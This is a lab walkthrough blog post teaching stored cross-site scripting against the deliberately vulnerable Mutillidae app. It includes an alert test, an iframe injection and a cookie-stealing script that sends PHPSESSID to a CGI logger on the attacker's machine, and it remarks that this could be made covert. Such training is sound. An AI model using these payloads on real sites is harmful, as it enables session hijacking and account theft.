Powered by Blogger.
Home » » OWASP Top 10 Web Hacking Final Lab 14 - Persistent Cross Site Scripting Injection #1

OWASP Top 10 Web Hacking Final Lab 14 - Persistent Cross Site Scripting Injection #1

Written By Akademy on Thursday, November 21, 2013 | 9:24 PM

  •  Open Mutillidae
     
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      1. Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/
  3. Start Apache2
    • Instructions:
      1. service apache2 start
      2. service apache2 status
      3. ps -eaf | grep apache2 | grep -v grep
    • Note(FYI):
      1. Start up the apache2 webserver.
      2. Display the status of the apache2 webserver.
      3. See the processes of the apache2 webserver.

Section 8. Persistent Cross Site Script(XSS) Example #1
  1. Add to your blog
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
  2. Basic Cross Site Scripting(XSS) Test
    • Instructions:
      1. Place the below text in the comment box.
        • <script>alert("Hello")</script>
      2. Click the Save Blog Entry Button
    • Notes (FYI):
      1. This is one of the most basic vulnerability tests to see if a windows alert popup is displayed.
  3. View XSS Results
    • Instructions:
      1. Click the OK Button
    • Notes (FYI):
      1. This is a successful Cross Site Scripting(XSS) Test.
  4. Navigate to View Blogs
    • Instructions:
      1. Click the View Blogs Link
  5. Show All Blog Entries
    • Instructions:
      1. Select Show All
      2. Click the View Blog Entries Button
  6. View XSS Results
    • Instructions:
      1. Click the OK Button
    • Notes (FYI):
      • Notice that the XSS injection from earlier was stored in the blog.
      • The storing of the XSS injection is what make this type of attack Persistent.  Because it never goes away until somebody clues in and protects their website.
  7. Reset Database
    • Instructions:
      1. Click the Reset DB Link
    • Notes (FYI):
      • This link will remove the XSS Injection from the database.
  8. Proceed with Database Reset
    • Instructions:
      1. Click the OK Button

Section 9. Persistent Cross Site Script(XSS) Example #2
  1. Add to your blog
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
  2. <iframe> Cross Site Scripting(XSS) Test
    • Instructions:
      1. Place the below text in the comment box.
        • <iframe src="http://www.cnn.com"></iframe>
      2. Click the Save Blog Entry Button
    • Notes (FYI):
      1. Now we are trying to see if we can display a website inside of the blog record using the <iframe> tag.
  3. View <iframe> Cross Site Scripting(XSS) Results
    • Instructions:
      1. Notice CNN is displayed in the blog.
    • Notes (FYI):
      1. Although this is benign in nature, a malicious person could easily make this malignant in a hurry. 
  4. Reset Database
    • Instructions:
      1. Click the Reset DB Link
    • Notes (FYI):
      • This link will remove the XSS Injection from the database.
  5. Proceed with Database Reset
    • Instructions:
      1. Click the OK Button

Section 9. Persistent Cross Site Script(XSS) Example #3
  1. Add to your blog
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
  2. Inspect Element
    • Instructions:
      1. Right Click in the Comment Box
      2. Click Inspect Element
    • Note(FYI):
      1. This is not a necessary step for the injection.  The goal is to allow the injection attempt to remain on the same line instead of being word-wrapped.
  3. Change Text Area Column Length
    • Instructions:
      1. Change 65 to 95
      2. Click Close Button  
  4. Cookie Harvest0r Cross Site Script (XSS) Injection
    • Note(FYI):
      1. Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
      2. This JavaScript tells the web browser to send the cookies back to the CGI Cookie Script on the BackTrack Machine.
    • Instructions:
      1. Place the below text in the comment box.
        • <SCRIPT>document.location="http://192.168.1.112/cgi-bin/logit.pl?"+document.cookie</SCRIPT>
      2. Click the Save Blog Entry
  5. View Cookie Harvest0r Cross Site Script (XSS) Results
    • Instructions:
      1. Click on the tab to create a new webpage.
    • Note(FYI):
      1. Notice the PHPSESSID (aka., document.cookie) information was sent to the BackTrack cgi script.
  6. Open Mutillidae
    • Notes (FYI):
      1. Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3).
      2. After you click on Add to your blog, you will again be redirected to the BackTrack CGI Havest0r script.
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/
      2. OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
  7. View Cookie Harvest0r Cross Site Script (XSS) Results
    • Instructions:
      1. Click on the tab to create a new webpage.
    • Note(FYI):
      1. Notice that almost immediately when you click on "Add to your blog" you are immediately redirected BackTrack's Cookie Havest0r Script.
      2. This type of exploit could be very malicious by just altering the verbose logging, where the cookie information is sent under the radar.
  8. Reset Database
    • Notes (FYI):
      1. Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/
      2. Click the Reset DB Link
  9. Proceed with Database Reset
    • Instructions:
      1. Click the OK Button

Section 10. Proof of Lab
  1. On BackTrack, Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window
     
  2. Proof of Lab Các bạn hãy quay lại toàn bộ tiến trình thực hành và text note có tên của mình
Share this article :

0 comments:

Post a Comment

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT